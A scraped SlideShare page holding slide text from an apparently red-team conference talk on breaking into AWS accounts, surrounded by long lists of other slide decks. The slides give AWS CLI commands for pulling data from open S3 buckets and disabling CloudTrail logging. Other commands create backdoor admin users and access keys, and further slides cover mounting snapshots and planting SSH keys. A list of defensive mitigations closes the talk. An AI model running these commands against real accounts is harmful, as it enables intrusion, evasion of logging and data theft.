AWS Summit Auckland 2014 | Black Belt Tips on AWS AWS Summit Auckland 2014 | Black Belt Tips on AWS
AWS Summit Auckland 2014 | Black Belt Tips on AWS
Amazon Web Services
 
自己修復的なインフラ -Self-Healing Infrastructure-
自己修復的なインフラ -Self-Healing Infrastructure-自己修復的なインフラ -Self-Healing Infrastructure-
自己修復的なインフラ -Self-Healing Infrastructure-
sinsoku listy
 
Understanding AWS Security
Understanding AWS SecurityUnderstanding AWS Security
Understanding AWS Security
Amazon Web Services
 
Continuous Integration and Deployment Best Practices on AWS (ARC307) | AWS re...
Continuous Integration and Deployment Best Practices on AWS (ARC307) | AWS re...Continuous Integration and Deployment Best Practices on AWS (ARC307) | AWS re...
Continuous Integration and Deployment Best Practices on AWS (ARC307) | AWS re...
Amazon Web Services
 
Continuous Deployment @ AWS Re:Invent
Continuous Deployment @ AWS Re:InventContinuous Deployment @ AWS Re:Invent
Continuous Deployment @ AWS Re:Invent
John Schneider
 

Similar to Pwned Cloud Society - BsidesSLC 2017 (20)

AWS CDK를 활용한 클라우드 프로그래밍
AWS CDK를 활용한 클라우드 프로그래밍AWS CDK를 활용한 클라우드 프로그래밍
AWS CDK를 활용한 클라우드 프로그래밍
 
AWS Black Belt Tips
AWS Black Belt TipsAWS Black Belt Tips
AWS Black Belt Tips
 
AWS Black Belt Tips
AWS Black Belt TipsAWS Black Belt Tips
AWS Black Belt Tips
 
Being cloudy with perl
Being cloudy with perlBeing cloudy with perl
Being cloudy with perl
 
Real world serverless - architecture, patterns and lessons learned
Real world serverless - architecture, patterns and lessons learnedReal world serverless - architecture, patterns and lessons learned
Real world serverless - architecture, patterns and lessons learned
 
Aws(in)security - the devil is in the detail
Aws(in)security - the devil is in the detailAws(in)security - the devil is in the detail
Aws(in)security - the devil is in the detail
 
AWS Public Sector Symposium 2014 Canberra | Black Belt Tips on AWS
AWS Public Sector Symposium 2014 Canberra | Black Belt Tips on AWS AWS Public Sector Symposium 2014 Canberra | Black Belt Tips on AWS
AWS Public Sector Symposium 2014 Canberra | Black Belt Tips on AWS
 
AWS Black Belt Tips
AWS Black Belt TipsAWS Black Belt Tips
AWS Black Belt Tips
 
Serverless Development To Production Pipeline
Serverless Development To Production PipelineServerless Development To Production Pipeline
Serverless Development To Production Pipeline
 
Diving into Common AWS Misconfigurations
Diving into Common AWS MisconfigurationsDiving into Common AWS Misconfigurations
Diving into Common AWS Misconfigurations
 
Lambdaless and AWS CDK
Lambdaless and AWS CDKLambdaless and AWS CDK
Lambdaless and AWS CDK
 
Day 3 - DevOps Culture - Continuous Integration & Continuous Deployment on th...
Day 3 - DevOps Culture - Continuous Integration & Continuous Deployment on th...Day 3 - DevOps Culture - Continuous Integration & Continuous Deployment on th...
Day 3 - DevOps Culture - Continuous Integration & Continuous Deployment on th...
 
Owning aws infrastructure services
Owning aws infrastructure servicesOwning aws infrastructure services
Owning aws infrastructure services
 
Bitbucket Pipelines - Powered by Kubernetes
Bitbucket Pipelines - Powered by KubernetesBitbucket Pipelines - Powered by Kubernetes
Bitbucket Pipelines - Powered by Kubernetes
 
Fin jaws 202103
Fin jaws 202103Fin jaws 202103
Fin jaws 202103
 
AWS Summit Auckland 2014 | Black Belt Tips on AWS
AWS Summit Auckland 2014 | Black Belt Tips on AWS AWS Summit Auckland 2014 | Black Belt Tips on AWS
AWS Summit Auckland 2014 | Black Belt Tips on AWS
 
自己修復的なインフラ -Self-Healing Infrastructure-
自己修復的なインフラ -Self-Healing Infrastructure-自己修復的なインフラ -Self-Healing Infrastructure-
自己修復的なインフラ -Self-Healing Infrastructure-
 
Understanding AWS Security
Understanding AWS SecurityUnderstanding AWS Security
Understanding AWS Security
 
Continuous Integration and Deployment Best Practices on AWS (ARC307) | AWS re...
Continuous Integration and Deployment Best Practices on AWS (ARC307) | AWS re...Continuous Integration and Deployment Best Practices on AWS (ARC307) | AWS re...
Continuous Integration and Deployment Best Practices on AWS (ARC307) | AWS re...
 
Continuous Deployment @ AWS Re:Invent
Continuous Deployment @ AWS Re:InventContinuous Deployment @ AWS Re:Invent
Continuous Deployment @ AWS Re:Invent
 

Recently uploaded

Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
DanBrown980551
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
Thijs Feryn
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
g2nightmarescribd
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
DianaGray10
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 

Recently uploaded (20)

Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
Accelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish CachingAccelerate your Kubernetes clusters with Varnish Caching
Accelerate your Kubernetes clusters with Varnish Caching
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 

Pwned Cloud Society - BsidesSLC 2017

  • 2. BRYCE KUNZ Bryce Kunz - @TweekFawkes @TweekFawkes PriorWork Experience: • Adobe DMa – RedTeam • DoD/NSA – Exploitation • DHS/OneNet – Defense Trainings & Sessions • RSA – mesos/docker • SAINTCON – osquery • BsidesLV – mesos/docker • Derbycon -WhiteLightning
  • 3. CLOUD… Bryce Kunz - @TweekFawkes … only one thing is for sure … AWS
  • 4. SO MUCH… Bryce Kunz - @TweekFawkes … only one thing is for sure … AWS Azure
  • 5. SOO MUCH… Bryce Kunz - @TweekFawkes … only one thing is for sure … AWS Azure Google
  • 6. SOOO MUCH… Bryce Kunz - @TweekFawkes … only one thing is for sure … AWS Azure GoogleRackspace
  • 7. NEW-NEW Bryce Kunz - @TweekFawkes … they want that new-new … AWS Azure GoogleRackspace etc…
  • 8. OLD IS NEW Bryce Kunz - @TweekFawkes … but really it’s not that much different …
  • 9. OLD WAYS Bryce Kunz - @TweekFawkes … push code … … jenkins … … do work son … CIBatch Jobs Web Dev Code
  • 10. NEW Bryce Kunz - @TweekFawkes … code … … some overpriced hipster services … … do work … CIBatch Jobs Web Dev S3 BucketBatch Lambda Code CodeDeploy
  • 11. ADMINS Bryce Kunz - @TweekFawkes ... admin … AD/LDAP CIBatch Jobs Web Admin Dev Code
  • 12. NEW ADMIN Bryce Kunz - @TweekFawkes … admins got to admin … AD/LDAP CIBatch Jobs Web Admin Dev Management Console S3 BucketBatch Lambda Code CodeDeploy
  • 13. DEVOPS Bryce Kunz - @TweekFawkes … DevOp-ocalypse … AD/LDAP CIBatch Jobs Web DevOps Management Console S3 BucketBatch Lambda Code CodeDeploy
  • 14. DEVOPS Bryce Kunz - @TweekFawkes … DevOp-ocalypse … AD/LDAP CIBatch Jobs Web DevOps Management Console S3 BucketBatch Lambda Code CodeDeploy
  • 15. BAD DAYS Bryce Kunz - @TweekFawkes …happen…
  • 16. BAD DAYS Bryce Kunz - @TweekFawkes … $50k!?!?!?
  • 17. BAD DAYS Bryce Kunz - @TweekFawkes …EC2 instances destroyed…
  • 18. INITIAL ACCESS Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • Code Repositories • DeploymentTools • Configuration Files
  • 19. PASTEBIN Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • - PasteBin.com
  • 20. GITHUB Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • - PasteBin.com • - GitHub.com
  • 21. REPOS Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • Code Repositories • - BitBucket, GitLab • - Gerrit, GitBlit, Git • - SVN, etc…
  • 22. DEPLOY ACCESS Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • Code Repositories • DeploymentTools • - Puppet, etc… • - Jenkins, etc…
  • 23. HACK & D/L ACCESS Bryce Kunz - @TweekFawkes Find a AWS Secrets • Open Source Intel • Code Repositories • DeploymentTools • Configuration Files • - Classic Hacks • -- D/L Secrets
  • 24. WHAT… Bryce Kunz - @TweekFawkes Services - Many Services - API Access - User Access … is the point?
  • 25. SO MANY … Bryce Kunz - @TweekFawkes …
  • 26. TYPES Bryce Kunz - @TweekFawkes …
  • 27. API Bryce Kunz - @TweekFawkes …
  • 28. USERS Bryce Kunz - @TweekFawkes …
  • 29. SETUP Bryce Kunz - @TweekFawkes Preparation • New EC2 Instance • Setup AWSTools On an Ubuntu 16.x EC2 instance… apt-get update apt-get install python-pip pip install aws-shell pip install awscli
  • 30. S3 BUCKETS Bryce Kunz - @TweekFawkes … S3 Bucket Amazon S3
  • 31. REGION ping -c3 exam.ple dig +nocmd exam.ple any +multiline +noall +answer nslookup 54.231.184.255 S3 Buckets • Find Region S3 Bucket Amazon S3
  • 32. S3 BUCKETS aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2 S3 Buckets • Find Region • Browse Files S3 Bucket Amazon S3
  • 33. S3 BUCKETS aws s3 ls s3://exam.ple/ --no-sign-request --region us-west-2 S3 Buckets • World Browsable S3 Bucket Amazon S3
  • 34. S3 BUCKETS aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2 S3 Buckets • World Browsable S3 Bucket Amazon S3
  • 35. S3 BUCKETS aws s3 ls s3://...exam.ple/ --no-sign-request --region us-west-2 S3 Buckets • Sensitive Files S3 Bucket Amazon S3
  • 36. S3 BUCKETS aws s3 sync s3://…exam.ple/ . --no-sign-request --region us-west-2 S3 Buckets • Sensitive Files S3 Bucket Amazon S3
  • 37. S3 BUCKETS git log S3 Buckets • Sensitive Files • - GIT • - SVN • - etc… S3 Bucket Amazon S3
  • 38. S3 BUCKETS git checkout f7c… S3 Buckets • Sensitive Files S3 Bucket Amazon S3
  • 39. LEVERAGE SECRETS Bryce Kunz - @TweekFawkes Preparation • New EC2 Instance • Setup AWSTools • Leverage Secrets
  • 40. CONFIGURE aws configure --profile example Preparation • New EC2 Instance • Setup AWSTools • Leverage Secrets AWS CLI AWS Cloud
  • 41. VERIFY (remove the spaces around the = character for easier scripts) Preparation • New EC2 Instance • Setup AWSTools • Leverage Secrets AWS CLI AWS Cloud
  • 42. WHOAMI aws --profile example sts get-caller-identity Survey Access • Who AreWe? AWS CLI AWS Cloud
  • 43. IAM WHO aws --profile example iam get-user Survey Access • Who AreWe? • IAMWho? AWS CLI AWS Cloud
  • 44. LOGGING Bryce Kunz - @TweekFawkes Survey Access • Who AreWe? • Logging? AWS CloudTrailAWS CLI AWS Cloud
  • 45. LOGGING? aws --profile api_cloudtrail cloudtrail describe-trails Survey Access • Who AreWe? • Logging? AWS CloudTrail AWS CloudTrailAWS CLI AWS Cloud
  • 46. STOP-LOGS aws --profile api_cloudtrail configure set region us-east-1 aws --profile api_cloudtrail cloudtrail stop-logging --name "arn:aws:cloudtrail:us-east- 1:…:trail/…" Survey Access • Who AreWe? • Logging? AWS CloudTrail
  • 47. OPSEC? Survey Access • Who AreWe? • Logging? AWS CloudTrail AWS CloudTrailAWS CLI AWS Cloud
  • 48. LOGGING? aws --profile api_cloudtrail cloudtrail describe-trails Survey Access • Who AreWe? • Logging? AWS CloudTrail AWS CloudTrailAWS CLI AWS Cloud
  • 49. NO MULTI aws --profile api_cloudtrail configure set region us-east-1 aws --profile api_cloudtrail cloudtrail update-trail --name "arn:aws:cloudtrail:us-east- 1:…:trail/…" --no-is-multi-region-trail --no-include-global-service-events Stops logging in all regions… • EXCEPT the HomeRegion AWS CloudTrail
  • 50. OPSEC… … Stops logging in all regions… • EXCEPT the HomeRegion AWS CloudTrail
  • 51. PERSIST Bryce Kunz - @TweekFawkes Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add Account AWS CLI AWS Cloud
  • 52. PERSIST aws --profile api_cloudtrail sts get-session-token Persistence • SessionToken • -Valid for 12 Hours AWS CLI AWS Cloud
  • 53. SETUP vi ~/.aws/credentials Persistence • SessionToken • -Valid for 12 Hours AWS CLI AWS Cloud
  • 54. SESSION aws --profile sessionTokens sts get-caller-identity Persistence • SessionToken • -Valid for 12 Hours AWS CLI AWS Cloud
  • 55. ADD KEY To an already existing user…. Persistence • SessionToken • -Valid for 12 Hours • Add Key AWS CLI AWS Cloud
  • 56. ADD KEY Persistence • SessionToken • -Valid for 12 Hours • Add Key aws --profile api_iam iam list-users AWS CLI AWS Cloud
  • 57. ADD KEY Persistence • SessionToken • -Valid for 12 Hours • Add Key aws --profile api_iam iam create-access-key --user-name test AWS CLI AWS Cloud
  • 58. ADD USER Bryce Kunz - @TweekFawkes Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add User AWS CLI AWS Cloud
  • 59. ADD USER aws --profile api_iam iam create-user --user-name mryan aws --profile api_iam iam add-user-to-group --user-name mryan --group-name Admin Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add User
  • 60. ADD KEY aws --profile api_iam iam create-access-key --user-name mryan Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add User
  • 61. ADD PASS aws --profile api_iam iam create-login-profile --user-name mryan --password examplepass Persistence • SessionToken • -Valid for 12 Hours • Add Key • Add User
  • 62. NEW EC2 Bryce Kunz - @TweekFawkes …
  • 63. EC2 META Metadata Service: 169.254.169.254 curl http://169.254.169.254/latest/meta-data/ RFC-3927: https://tools.ietf.org/html/rfc3927 AWS: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html AWS QueryTool: https://aws.amazon.com/code/1825 …
  • 64. AZURE META Metadata Service: 169.254.169.254 curl http://169.254.169.254/metadata/v1/maintenance curl http://169.254.169.254/metadata/v1/InstanceInfo (these are mostly useless for hackers…) but useful information is copied into the … /var/lib/waagent directory when the instance is created… (root access needed) • IP address, hostname, subscription ID, resource group name, etc… …
  • 65. SNAPS &IAM aws --profile api_ec2 ec2 create-volume --availability-zone us-west-2a --region us-west-2 -- snapshot-id snap-0b49342abd1bdcb89 mount /dev/xvdb1 /mnt find /mnt -type f -mtime -1 2>/dev/null | grep -v "/var/" | grep -v "/proc/" | grep -v "/dev/" | grep -v "/sys/" | grep -v "/run/" | less …
  • 66. HARD BOOT Bryce Kunz - @TweekFawkes … Horrible OPSEC but it works… - Power off a server - Mount the server’s hard drive using another EC2 - Modify the server for remote access (e.g. add an SSH key to root user) - Power back on the server & PROFIT!
  • 67. MITIGATIONS • Single Purpose Secrets • Limited the Access of each Secret • Create roles and limit the access of each role • You can ACL off secrets to only work from certain IP addresses • Log API calls (e.g. cloudtrail) • Never use root secrets (use as a break glass account only) • Rotate Secrets Frequently • Encrypt secrets within GIT and other data stores …
  • 68. THANKS! Bryce Kunz - @TweekFawkes …
  • 69. References • http://level4- 1156739cfb264ced6de514971a4bef68.flaws.cloud/hint 2.html • https://www.slideshare.net/chrisgates/devoops- attacks-and-defenses-for-devops-toolchains • http://flaws.cloud/ • https://danielgrzelak.com/disrupting-aws-logging- a42e437d6594 • https://danielgrzelak.com/backdooring-an-aws- account-da007d36f8f9 • https://danielgrzelak.com/exploring-an-aws-account- after-pwning-it-ff629c2aae39 • http://docplayer.net/24014561-Defending-the-cloud- from-the-full-stack-hack.html